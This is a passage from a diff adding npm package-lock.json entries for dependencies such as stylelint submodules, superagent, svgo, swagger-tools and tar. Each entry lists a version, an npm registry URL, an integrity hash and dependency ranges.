"https://github.com/chalk/ansi-regex?sponsor=1" + } + }, + "node_modules/stylelint/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/stylelint/node_modules/balanced-match": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-2.0.0.tgz", + "integrity": "sha512-1ugUSr8BHXRnK23KfuYS+gVMC3LB8QGH9W1iGtDPsNWoQbgtXSExkBu2aDR4epiGWZOjZsj6lDl/N/AqqTC3UA==", + "dev": true, + "peer": true + }, + "node_modules/stylelint/node_modules/cosmiconfig": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-9.0.0.tgz", + "integrity": "sha512-itvL5h8RETACmOTFc4UfIyB2RfEHi71Ax6E/PivVxq9NseKbOWpeyHEOIbmAw1rs8Ak0VursQNww7lf7YtUwzg==", + "dev": true, + "peer": true, + "dependencies": { + "env-paths": "^2.2.1", + "import-fresh": "^3.3.0", + "js-yaml": "^4.1.0", + "parse-json": "^5.2.0" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/d-fischer" + }, + "peerDependencies": { + "typescript": ">=4.9.5" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/stylelint/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "peer": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/stylelint/node_modules/file-entry-cache": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-8.0.0.tgz", + "integrity": "sha512-XXTUwCvisa5oacNGRP9SfNtYBNAMi+RPwBFmblZEF7N7swHYQS6/Zfk7SRwx4D5j3CH211YNRco1DEMNVfZCnQ==", + "dev": true, + "peer": true, + "dependencies": { + "flat-cache": "^4.0.0" + }, + "engines": { + "node": ">=16.0.0" + } + }, + "node_modules/stylelint/node_modules/flat-cache": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-4.0.1.tgz", + "integrity": "sha512-f7ccFPK3SXFHpx15UIGyRJ/FJQctuKZ0zVuN3frBo4HnK3cay9VEW0R6yPYFHC0AgqhukPzKjq22t5DmAyqGyw==", + "dev": true, + "peer": true, + "dependencies": { + "flatted": "^3.2.9", + "keyv": "^4.5.4" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/stylelint/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "peer": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/stylelint/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "dev": true, + "peer": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/stylelint/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true, + "peer": true + }, + "node_modules/stylelint/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/stylelint/node_modules/strip-ansi": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", + "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "dev": true, + "peer": true, + "dependencies": { + "ansi-regex": "^6.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/strip-ansi?sponsor=1" + } + }, + "node_modules/superagent": { + "version": "3.8.3", + "resolved": "https://registry.npmjs.org/superagent/-/superagent-3.8.3.tgz", + "integrity": "sha512-GLQtLMCoEIK4eDv6OGtkOoSMt3D+oq0y3dsxMuYuDvaNUvuT8eFBuLmfR0iYYzHC1e8hpzC6ZsxbuP6DIalMFA==", + "deprecated": "Please upgrade to v7.0.2+ of superagent. We have fixed numerous issues with streams, form-data, attach(), filesystem errors not bubbling up (ENOENT on attach()), and all tests are now passing. See the releases tab for more information at . Thanks to @shadowgate15, @spence-s, and @niftylettuce. Superagent is sponsored by Forward Email at .", + "dependencies": { + "component-emitter": "^1.2.0", + "cookiejar": "^2.1.0", + "debug": "^3.1.0", + "extend": "^3.0.0", + "form-data": "^2.3.1", + "formidable": "^1.2.0", + "methods": "^1.1.1", + "mime": "^1.4.1", + "qs": "^6.5.1", + "readable-stream": "^2.3.5" + }, + "engines": { + "node": ">= 4.0" + } + }, + "node_modules/superagent/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/superagent/node_modules/form-data": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", + "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/superagent/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/superagent/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/superagent/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/superagent/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/supports-color": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", + "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/supports-color?sponsor=1" + } + }, + "node_modules/supports-hyperlinks": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/supports-hyperlinks/-/supports-hyperlinks-3.0.0.tgz", + "integrity": "sha512-QBDPHyPQDRTy9ku4URNGY5Lah8PAaXs6tAAwp55sL5WCsSW7GIfdf6W5ixfziW+t7wh3GVvHyHHyQ1ESsoRvaA==", + "dev": true, + "peer": true, + "dependencies": { + "has-flag": "^4.0.0", + "supports-color": "^7.0.0" + }, + "engines": { + "node": ">=14.18" + } + }, + "node_modules/supports-hyperlinks/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "peer": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/supports-preserve-symlinks-flag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/svg-tags": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/svg-tags/-/svg-tags-1.0.0.tgz", + "integrity": "sha512-ovssysQTa+luh7A5Weu3Rta6FJlFBBbInjOh722LIt6klpU2/HtdUbszju/G4devcvk8PGt7FCLv5wftu3THUA==", + "dev": true, + "peer": true + }, + "node_modules/svgo": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/svgo/-/svgo-3.0.4.tgz", + "integrity": "sha512-T+Xul3JwuJ6VGXKo/p2ndqx1ibxNKnLTvRc1ZTWKCfyKS/GgNjRZcYsK84fxTsy/izr91g/Rwx6fGnVgaFSI5g==", + "dev": true, + "dependencies": { + "@trysound/sax": "0.2.0", + "commander": "^7.2.0", + "css-select": "^5.1.0", + "css-tree": "^2.2.1", + "css-what": "^6.1.0", + "csso": "5.0.5", + "picocolors": "^1.0.0" + }, + "bin": { + "svgo": "bin/svgo" + }, + "engines": { + "node": ">=14.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/svgo" + } + }, + "node_modules/svgo/node_modules/commander": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-7.2.0.tgz", + "integrity": "sha512-QrWXB+ZQSVPmIWIhtEO9H+gwHaMGYiF5ChvoJ+K9ZGHG/sVsa6yiesAD1GC/x46sET00Xlwo1u49RVVVzvcSkw==", + "dev": true, + "engines": { + "node": ">= 10" + } + }, + "node_modules/svgo/node_modules/css-select": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/css-select/-/css-select-5.1.0.tgz", + "integrity": "sha512-nwoRF1rvRRnnCqqY7updORDsuqKzqYJ28+oSMaJMMgOauh3fvwHqMS7EZpIPqK8GL+g9mKxF1vP/ZjSeNjEVHg==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0", + "css-what": "^6.1.0", + "domhandler": "^5.0.2", + "domutils": "^3.0.1", + "nth-check": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/svgo/node_modules/css-what": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/css-what/-/css-what-6.1.0.tgz", + "integrity": "sha512-HTUrgRJ7r4dsZKU6GjmpfRK1O76h97Z8MfS1G0FozR+oF2kG6Vfe8JE6zwrkbxigziPHinCJ+gCPjA9EaBDtRw==", + "dev": true, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/svgo/node_modules/dom-serializer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", + "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", + "dev": true, + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "entities": "^4.2.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/svgo/node_modules/domhandler": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", + "integrity": "sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", + "dev": true, + "dependencies": { + "domelementtype": "^2.3.0" + }, + "engines": { + "node": ">= 4" + }, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/svgo/node_modules/domutils": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.1.0.tgz", + "integrity": "sha512-H78uMmQtI2AhgDJjWeQmHwJJ2bLPD3GMmO7Zja/ZZh84wkm+4ut+IUnUdRa8uCGX88DiVx1j6FRe1XfxEgjEZA==", + "dev": true, + "dependencies": { + "dom-serializer": "^2.0.0", + "domelementtype": "^2.3.0", + "domhandler": "^5.0.3" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/svgo/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dev": true, + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/swagger-client": { + "version": "3.18.4", + "resolved": "https://registry.npmjs.org/swagger-client/-/swagger-client-3.18.4.tgz", + "integrity": "sha512-Wj26oEctONq/u0uM+eSj18675YM5e2vFnx7Kr4neLeXEHKUsfceVQ/OdtrBXdrT3VbtdBbZfMTfl1JOBpix2MA==", + "dependencies": { + "@babel/runtime-corejs3": "^7.11.2", + "btoa": "^1.2.1", + "cookie": "~0.4.1", + "cross-fetch": "^3.1.5", + "deepmerge": "~4.2.2", + "fast-json-patch": "^3.0.0-1", + "form-data-encoder": "^1.4.3", + "formdata-node": "^4.0.0", + "is-plain-object": "^5.0.0", + "js-yaml": "^4.1.0", + "lodash": "^4.17.21", + "qs": "^6.10.2", + "traverse": "~0.6.6", + "url": "~0.11.0" + } + }, + "node_modules/swagger-client/node_modules/cookie": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz", + "integrity": "sha512-aSWTXFzaKWkvHO1Ny/s+ePFpvKsPnjc551iI41v3ny/ow6tBG5Vd+FuqGNhh1LxOmVzOlGUriIlOaokOvhaStA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/swagger-client/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/swagger-client/node_modules/punycode": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", + "integrity": "sha1-llOgNvt8HuQjQvIyXM7v6jkmxI0=" + }, + "node_modules/swagger-client/node_modules/traverse": { + "version": "0.6.6", + "resolved": "https://registry.npmjs.org/traverse/-/traverse-0.6.6.tgz", + "integrity": "sha1-y99WD9e5r2MlAv7UD5GMFX6pcTc=" + }, + "node_modules/swagger-client/node_modules/url": { + "version": "0.11.0", + "resolved": "https://registry.npmjs.org/url/-/url-0.11.0.tgz", + "integrity": "sha1-ODjpfPxgUh63PFJajlW/3Z4uKPE=", + "dependencies": { + "punycode": "1.3.2", + "querystring": "0.2.0" + } + }, + "node_modules/swagger-converter": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/swagger-converter/-/swagger-converter-0.1.7.tgz", + "integrity": "sha1-oJdRnG8e5N1n4wjZtT3cnCslf5c=", + "dependencies": { + "lodash.clonedeep": "^2.4.1" + } + }, + "node_modules/swagger-tools": { + "version": "0.10.4", + "resolved": "https://registry.npmjs.org/swagger-tools/-/swagger-tools-0.10.4.tgz", + "integrity": "sha512-VQpijIi8cpB/frUZOZlVpS7U3CrdSAZBfiHu448R1njiNXUnE7heF3Svz3qFBr5SYtaPvaqWpHMbvboirCXVzA==", + "license": "MIT", + "dependencies": { + "async": "^2.5.0", + "body-parser": "1.18.2", + "commander": "~2.11.0", + "debug": "^3.1.0", + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", + "multer": "^1.1.0", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", + "qs": "^6.0.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", + "swagger-converter": "^0.1.7", + "traverse": "^0.6.6", + "z-schema": "^3.15.4" + }, + "bin": { + "swagger-tools": "bin/swagger-tools" + } + }, + "node_modules/swagger-tools/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "license": "MIT", + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "node_modules/swagger-tools/node_modules/async": { + "version": "2.6.4", + "resolved": "https://registry.npmjs.org/async/-/async-2.6.4.tgz", + "integrity": "sha512-mzo5dfJYwAn29PeiJ0zvwTo04zj8HDJj0Mn8TD7sno7q12prdbnasKJHhkm2c1LgrhlJ0teaea8860oxi51mGA==", + "license": "MIT", + "dependencies": { + "lodash": "^4.17.14" + } + }, + "node_modules/swagger-tools/node_modules/commander": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.11.0.tgz", + "integrity": "sha512-b0553uYA5YAEGgyYIGYROzKQ7X5RAqedkfjiZxwi0kL1g3bOaBNNZfYkzt/CL0umgD5wc9Jec2FbB98CjkMRvQ==", + "license": "MIT" + }, + "node_modules/swagger-tools/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/swagger-tools/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "license": "MIT", + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/swagger-tools/node_modules/path-to-regexp": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-3.3.0.tgz", + "integrity": "sha512-qyCH421YQPS2WFDxDjftfc1ZR5WKQzVzqsp4n9M2kQhVOo/ByahFoUNJfl58kOcEGfQ//7weFTDhm+ss8Ecxgw==" + }, + "node_modules/symbol-tree": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/symbol-tree/-/symbol-tree-3.2.4.tgz", + "integrity": "sha512-9QNk5KwDF+Bvz+PyObkmSYjI5ksVUYtjW7AU22r2NKcfLJcXp96hkDWU3+XndOsUb+AQ9QhfzfCT2O+CNWT5Tw==", + "dev": true + }, + "node_modules/table": { + "version": "6.8.2", + "resolved": "https://registry.npmjs.org/table/-/table-6.8.2.tgz", + "integrity": "sha512-w2sfv80nrAh2VCbqR5AK27wswXhqcck2AhfnNW76beQXskGZ1V12GwS//yYVa3d3fcvAip2OUnbDAjW2k3v9fA==", + "dev": true, + "dependencies": { + "ajv": "^8.0.1", + "lodash.truncate": "^4.4.2", + "slice-ansi": "^4.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/table/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/table/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/tapable": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/tapable/-/tapable-2.2.1.tgz", + "integrity": "sha512-GNzQvQTOIP6RyTfE2Qxb8ZVlNmw0n88vp1szwWRimP02mnTsx3Wtn5qRdqY9w2XduFNUgvOwhNnQsjwCp+kqaQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/tar": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", + "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "dependencies": { + "chownr": "^2.0.0", + "fs-minipass": "^2.0.0", + "minipass": "^5.0.0", + "minizlib": "^2.1.1", + "mkdirp": "^1.0.3", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/tar-fs": { + "version": "3.0.8", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.8.tgz", + "integrity": "sha512-ZoROL70jptorGAlgAYiLoBLItEKw/fUxg9BSYK/dF/GAGYFJOJJJMvjPAKDJraCXFwadD456FCuvLWgfhMsPwg==", + "license": "MIT", + "dependencies": { + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + }, + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" + } + }, + "node_modules/tar-fs/node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", + "dependencies": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" + } + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tar/node_modules/chownr": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", + "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "engines": { + "node": ">=10" + } + }, + "node_modules/tar/node_modules/minipass": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", + "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/tar/node_modules/mkdirp": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "bin": { + "mkdirp": "bin/cmd.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/tar/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/tarn": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/tarn/-/tarn-3.0.2.tgz", + "integrity": "sha512-51LAVKUSZSVfI05vjPESNc5vwqqZpbXCsU+/+wxlOrUjk2SnFTt97v9ZgQrD4YmxYW1Px6w2KjaDitCfkvgxMQ==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/tdigest": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/tdigest/-/tdigest-0.1.1.tgz", + "integrity": "sha1-Ljyyw56kSeVdHmzZEReszKRYgCE=", + "dependencies": { + "bintrees": "1.0.1" + } + }, + "node_modules/teeny-request": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-7.1.3.tgz", + "integrity": "sha512-Ew3aoFzgQEatLA5OBIjdr1DWJUaC1xardG+qbPPo5k/y/3fMwXLxpjh5UB5dVfElktLaQbbMs80chkz53ByvSg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/teeny-request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/teex": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/teex/-/teex-1.0.1.tgz", + "integrity": "sha512-eYE6iEI62Ni1H8oIa7KlDU6uQBtqr4Eajni3wX7rpfXD8ysFx8z0+dri+KWEPWpBsxXfxu58x/0jvTVT1ekOSg==", + "dev": true, + "dependencies": { + "streamx": "^2.12.5" + } + }, + "node_modules/temp": { + "version": "0.8.4", + "resolved": "https://registry.npmjs.org/temp/-/temp-0.8.4.tgz", + "integrity": "sha512-s0ZZzd0BzYv5tLSptZooSjK8oj6C+c19p7Vqta9+6NPOf7r+fxq0cJe6/oN4LTC79sy5NY8ucOJNgwsKCSbfqg==", + "dependencies": { + "rimraf": "~2.6.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/temp/node_modules/rimraf": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz", + "integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==", + "dependencies": { + 